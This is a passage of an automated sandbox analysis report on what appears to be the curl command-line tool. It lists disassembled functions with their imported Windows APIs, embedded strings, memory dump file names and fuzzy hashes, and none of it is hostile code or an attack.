Part of subcall function 000000013F493968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4939AD

Part of subcall function 000000013F4A1D84: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1DA8
Part of subcall function 000000013F4A1D84: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1DC4
Part of subcall function 000000013F4A1D84: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F4A1DD7

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4BC4CF

Strings

secur32.dll, xrefs: 000000013F4BC4A2
InitSecurityInterfaceA, xrefs: 000000013F4BC4C5
security.dll, xrefs: 000000013F4BC4A9

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: AddressProc$HandleModule$_mbspbrk
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 214550245-3788156360
Opcode ID: ca684d57bb3087235043fea4247261b72d7f181185320e259ac88cc775b47e45
Instruction ID: 53e7b3a44aaf51da8477affd327e26419add21c42223b057690f48bd08a73e56
Opcode Fuzzy Hash: ca684d57bb3087235043fea4247261b72d7f181185320e259ac88cc775b47e45
Instruction Fuzzy Hash: 35013734E06B4581FE14AB14F9897E323E0BB05348F84853C998D422A2EF3C9B8BC600

Function 000000013F483620 Relevance: 6.3, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48363D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F483662
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F483687
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4836AC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4836D1

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 23bcfd8c3edb1cac29dd381e654b8375a78a08816616135fa5c85e0b472d848f
Instruction ID: 687f1c423e8597c356e9d1840f60be63e2812248c4eb9ab65cc6915bfaaa0e3e
Opcode Fuzzy Hash: 23bcfd8c3edb1cac29dd381e654b8375a78a08816616135fa5c85e0b472d848f
Instruction Fuzzy Hash: C521CE32B10B0583FF15AF15E8693E723A4BB45B95F0C463DD90A4A3A2EF6DC64AD344

Function 000000013F48A62C Relevance: 6.1, APIs: 4, Instructions: 80fileCOMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,000000013F48A7A6,?,?,?,?,000000013F4811A7), ref: 000000013F48A69E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,000000013F48A7A6,?,?,?,?,000000013F4811A7), ref: 000000013F48A6EB
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,000000013F48A7A6,?,?,?,?,000000013F4811A7), ref: 000000013F48A6FC
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,000000013F48A7A6,?,?,?,?,000000013F4811A7), ref: 000000013F48A71C

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fputs$fwrite
String ID:
API String ID: 2206100360-0
Opcode ID: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
Instruction ID: cc6211b09ef37f573b852b65dd34e9b045fe9a3e6780a399fafa22c294a1109c
Opcode Fuzzy Hash: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
Instruction Fuzzy Hash: 34310531B05A84A8FB119F22D4047EA2F60B304FE4F490539DEAA073D8DA7EC687C300

Function 000000013F48FE2C Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48FE93
ferror.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48FE9F
feof.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48FEC7

Part of subcall function 000000013F493AE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F493B1B

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48FEEF

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$feofferrorfread
String ID:
API String ID: 1112580154-0
Opcode ID: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
Instruction ID: 63c3ec8809c9dda1edc334ac15392d5deb7567a4a3427a729f2d8d1fe70bf27c
Opcode Fuzzy Hash: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
Instruction Fuzzy Hash: 90217172A14B8486F7609B11E8543EB67A0F798BD8F040539EF8D4669AEF7DC642C700

Function 000000013F4AC2A8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F483E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483E89

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4AC2F3

Strings

., xrefs: 000000013F4AC315
unlimited, xrefs: 000000013F4AC2E7
%256s "%64[^"]", xrefs: 000000013F4AC2D6

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __stdio_common_vsscanfstrcmp
String ID: %256s "%64[^"]"$.$unlimited
API String ID: 2755920870-3006405630
Opcode ID: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
Instruction ID: 3774c720e0b885ae0220488c38016adb463a8408ad311619b2b66317713d49f0
Opcode Fuzzy Hash: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
Instruction Fuzzy Hash: 8F019672A05A8455FE60D735E4113DB63D0B788794F80423AAA9D876D5EE2CC30ECB00

Function 000000013F4ABB58 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 000000013F4ABB8C

Part of subcall function 000000013F4B585C: inet_pton.WS2_32 ref: 000000013F4B5881
Part of subcall function 000000013F4B585C: inet_pton.WS2_32 ref: 000000013F4B5898

Strings

max-age=, xrefs: 000000013F4ABBD8
includesubdomains, xrefs: 000000013F4ABC91

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: inet_pton$_time64
String ID: includesubdomains$max-age=
API String ID: 868955570-1235841791
Opcode ID: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
Instruction ID: 4a54789776a73b6a4b450780be0aacb02ac16acfc1485b2c6a887f60350b93d8
Opcode Fuzzy Hash: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
Instruction Fuzzy Hash: 6B610432A2469546FE758B21A8203EB2BD0B716B94F98513DDDAA077C6DA2CC70FD710

Function 000000013F4B2910 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4B2BF1

Strings

User-Agent: %s, xrefs: 000000013F4B2BE3
No URL set, xrefs: 000000013F4B299F

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: No URL set$User-Agent: %s
API String ID: 1992661772-339178133
Opcode ID: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
Instruction ID: 5a04d7be17c63513c59ac2e14f846f7b9c87df389f0490476594b72da1ec6216
Opcode Fuzzy Hash: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
Instruction Fuzzy Hash: D0A13F32704BC5A7EB5D9B35D6943DAB7A4F318B90F040129DBA947792DF24AB72C340

Function 000000013F481C50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

Part of subcall function 000000013F493014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,000000013F4810B6), ref: 000000013F493026

__swprintf_l.LIBCMT ref: 000000013F481E4A
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481E6E

Strings

%%-%ds %%5.1f%%%%, xrefs: 000000013F481E39

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: CounterPerformanceQuery__swprintf_lfflush
String ID: %%-%ds %%5.1f%%%%
API String ID: 1637530157-3852588901
Opcode ID: 7fc2aaca9faa570e508df079fb7f1f14d55daf7fa87027be52c1f9972c98955e
Instruction ID: d719194dfc81c48fcda0ff1a43c707ec09da5a24cc788bd4529d26e3e248e441
Opcode Fuzzy Hash: 7fc2aaca9faa570e508df079fb7f1f14d55daf7fa87027be52c1f9972c98955e
Instruction Fuzzy Hash: 81610932B00B8486DA35DB26E5407EBAB95EB947C0F44423ADE5A47795EE39D682C700

Function 000000013F4B014C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4B02B2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 000000013F4B035A

Strings

%lx, xrefs: 000000013F4B02A3

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l_errno
String ID: %lx
API String ID: 1766030736-1448181948
Opcode ID: 87625db4246a367d9eedabe39b3ecc180280514238f58691ef4228dad3b3b527
Instruction ID: b352d7d100730aeff19403ea9cb80a85d1a07b6cf9a8ed6abf7ca69767adcb6c
Opcode Fuzzy Hash: 87625db4246a367d9eedabe39b3ecc180280514238f58691ef4228dad3b3b527
Instruction Fuzzy Hash: E2511C32A1C68846FB398A1CE4107EFABD0B385795F185239DDC6536A6D67CCE87C701

Function 000000013F493160 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F49328E

Strings

"%s":, xrefs: 000000013F493265
"%s":null, xrefs: 000000013F4931D4

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fputs
String ID: "%s":$"%s":null
API String ID: 1795875747-2759546026
Opcode ID: 94f1828a4364b6fde38a6bb74b43acbb53ea16637b28cbefc31fd65b807f0a42
Instruction ID: 5b6a5181f34fcedc565c22ef2a4dca2e68beac22201abe079b88b1d1c81d1239
Opcode Fuzzy Hash: 94f1828a4364b6fde38a6bb74b43acbb53ea16637b28cbefc31fd65b807f0a42
Instruction Fuzzy Hash: E7414F71F0074095FB648B61D8463FF23E8E752B84F58893EDA19477A5EB78CA96C340

Function 000000013F4B5634 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 000000013F4B5685
inet_pton.WS2_32 ref: 000000013F4B56A4

Strings

::1, xrefs: 000000013F4B5695

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: htonsinet_pton
String ID: ::1
API String ID: 3877577928-2731173655
Opcode ID: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
Instruction ID: 3beb536bfeab2de846719fb94e4b18c7f1049e230b55e381c0b3595eef7e1858
Opcode Fuzzy Hash: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
Instruction Fuzzy Hash: 0531A032914B84C6E710CF24E4453AA73B0FB98B48F149229EA8C4B75ADB7DC696CB40

Function 000000013F4937A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F493585), ref: 000000013F4937CB
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F49381E

Strings

"curl_version":, xrefs: 000000013F493838

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fputs
String ID: "curl_version":
API String ID: 1795875747-1127485152
Opcode ID: 8656f8eb16561c1942904a16d6f56fda332278a3463819e59bc60b2a4c127616
Instruction ID: e9925f28c52f5c8a23c9a33037dd1b0ad802fc03d3e543c125b63708bae3f44f
Opcode Fuzzy Hash: 8656f8eb16561c1942904a16d6f56fda332278a3463819e59bc60b2a4c127616
Instruction Fuzzy Hash: E7214932B14A9091EB20DF16E8557EBB7A4F784BC4F85443AAD494776AEE38C617C300

Function 000000013F4A87EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F4A8844
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4A8874

Strings

Invalid zoneid: %s; %s, xrefs: 000000013F4A888B

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errnostrtoul
String ID: Invalid zoneid: %s; %s
API String ID: 660391088-3603716281
Opcode ID: a4f965218f8f8f188939f4127da51a84dd2ac8c7a826c2c97e0367bfd7fcf2da
Instruction ID: 403c15d0de89a2f9ec5225ba93953f66e3937c10d81e392c6850b009bf20a2ff
Opcode Fuzzy Hash: a4f965218f8f8f188939f4127da51a84dd2ac8c7a826c2c97e0367bfd7fcf2da
Instruction Fuzzy Hash: C3211071A0468582FA709B11E8547DB73A0FB88B98F444229EA8D47799DF3CD74AC700

Function 000000013F4B5740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 000000013F4B5760
inet_pton.WS2_32 ref: 000000013F4B5779

Part of subcall function 000000013F4B5634: htons.WS2_32 ref: 000000013F4B5685
Part of subcall function 000000013F4B5634: inet_pton.WS2_32 ref: 000000013F4B56A4

Strings

127.0.0.1, xrefs: 000000013F4B576D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: htonsinet_pton
String ID: 127.0.0.1
API String ID: 3877577928-3619153832
Opcode ID: 93b06e7648510524775c2b6d04d80b245e725dbf242ffdf64893bda09ddb95bd
Instruction ID: 59265127c350d2f3239df99ffa4cf40b24dab5f70fa80dc36b844e3650554b4d
Opcode Fuzzy Hash: 93b06e7648510524775c2b6d04d80b245e725dbf242ffdf64893bda09ddb95bd
Instruction Fuzzy Hash: AB218176911B44C6E7018F25E4443AEB7B0FB98B04F194529DB8C47365EF7DCA8ACB40

Function 000000013F4B008C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4B00DF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4B0122

Strings

%d.%d.%d.%d, xrefs: 000000013F4B00B8

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l_errno
String ID: %d.%d.%d.%d
API String ID: 1766030736-3491811756
Opcode ID: e9db26e9fdd4816fa0bbd79cc1c79cf9f5f4d3b1d044d412b7ca227abae594d5
Instruction ID: 83d76389fc533416ebd3a9076205c259d36b2ecb4b34ce479d1d5fb0e51f3cac
Opcode Fuzzy Hash: e9db26e9fdd4816fa0bbd79cc1c79cf9f5f4d3b1d044d412b7ca227abae594d5
Instruction Fuzzy Hash: BE11D37260C7C886EB118B28E01139BBBA0F759764F684629EBDD037E6D73DC606CB00

Function 000000013F4A3AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 000000013F4A3B67
setsockopt.WS2_32 ref: 000000013F4A3B96

Part of subcall function 000000013F493968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F49399D
Part of subcall function 000000013F493968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4939AD

Strings

@, xrefs: 000000013F4A3B04

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: AddressHandleModuleProcgetsockoptsetsockopt
String ID: @
API String ID: 1224256098-2726393805
Opcode ID: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
Instruction ID: c73206bb0958772e8cdeeeefb277a0e1f127dde95e5934d8803f18c129a9aa4e
Opcode Fuzzy Hash: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
Instruction Fuzzy Hash: 4D111E71A0478187F720CF14E4487ABB7A1F785759F540138EE8547BA6E7BEC64ACB04

Function 000000013F48A7AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000014,00000000,000000013F489BD1), ref: 000000013F48A7D7

Strings

curl: , xrefs: 000000013F48A7D0
curl: try 'curl --help' for more information, xrefs: 000000013F48A7F4

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fputs
String ID: curl: $curl: try 'curl --help' for more information
API String ID: 1795875747-4128371185
Opcode ID: e8ad7becc2f11b03f9842552c4c794a81601776dc52dd38ec840e7c5da76bb48
Instruction ID: b83eb0c4e64690222be40436873982866fea6dbce69d563981dbd3fd69936001
Opcode Fuzzy Hash: e8ad7becc2f11b03f9842552c4c794a81601776dc52dd38ec840e7c5da76bb48
Instruction Fuzzy Hash: B5F08CB6A00B0481EE08DF06F8417CA7721ABA9BC0F909039DE1807365EB38C79AC300

Function 000000013F48F54C Relevance: 5.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,000000013F48F940), ref: 000000013F48F5D8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,000000013F48F940), ref: 000000013F48F5E7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,000000013F48F940), ref: 000000013F48F5F6
